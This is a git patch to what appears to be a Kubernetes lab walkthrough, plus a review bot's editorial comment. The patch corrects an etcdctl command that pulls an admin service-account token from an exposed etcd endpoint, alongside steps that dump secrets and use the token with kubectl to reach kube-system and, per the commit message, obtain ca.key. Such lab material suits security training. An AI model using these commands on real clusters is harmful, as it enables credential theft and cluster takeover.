From 8c424f5caab1b6b2889945c80600c909f6ce0b4e Mon Sep 17 00:00:00 2001 From: MrIntern Date: Thu, 18 Aug 2022 13:37:34 +0100 Subject: [PATCH] fix broken command /registry/secrets/kube-system/admins-account-token-RAND doesn't exist, but a very similarly worded account token does: /registry/secrets/default/admins-account-token-RAND Upon testing, this account token (even though it's associated with the default namespace) gives you access to the kube-system namespace and is sufficient for obtaining ca.key I've replaced the broken command with a working one to avoid future confusion. --- Scenario Walkthroughs/etcd.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Scenario Walkthroughs/etcd.md b/Scenario Walkthroughs/etcd.md index feea617..00eef13 100644 --- a/Scenario Walkthroughs/etcd.md +++ b/Scenario Walkthroughs/etcd.md @@ -5,7 +5,7 @@ 3. First we need to dump some secrets out of the etcd database `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[CLUSTERIP]:2379 get / --prefix --keys-only | grep token` 4. Then we'll need a service account token to authenticate to the cluster with. Looking through the list of accounts we can see an admins-account - `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/kube-system/admins-account-token-[RAND]` + `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/default/admins-account-token-[RAND]` The service account token starts with ey and ends just before the word `kubernetes.io` in the token. 5. With the service token we can use kubectl , first get the API pod name `kubectl --insecure-skip-tls-verify -shttps://[IP]:6443/ --token="[TOKEN]" -n kube-system get po`
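Review bot: The replacement line in step 4 now reads the token from `/registry/secrets/default/admins-account-token-[RAND]`, but the walkthrough text around it never says that the secret lives in the `default` namespace, nor why a token from there works with `-n kube-system` in step 5; that explanation exists only in the commit message. Suggest adding a sentence to step 4 stating that the admins-account token sits under `default` and still has access to `kube-system`, and telling the reader to copy the key path exactly as the `grep token` output of step 3 prints it, so the step stays correct if the path differs in their cluster. Separately, step 4 uses `[IP]` where step 3 uses `[CLUSTERIP]` for the same `:2379` endpoint; using one placeholder throughout would be clearer.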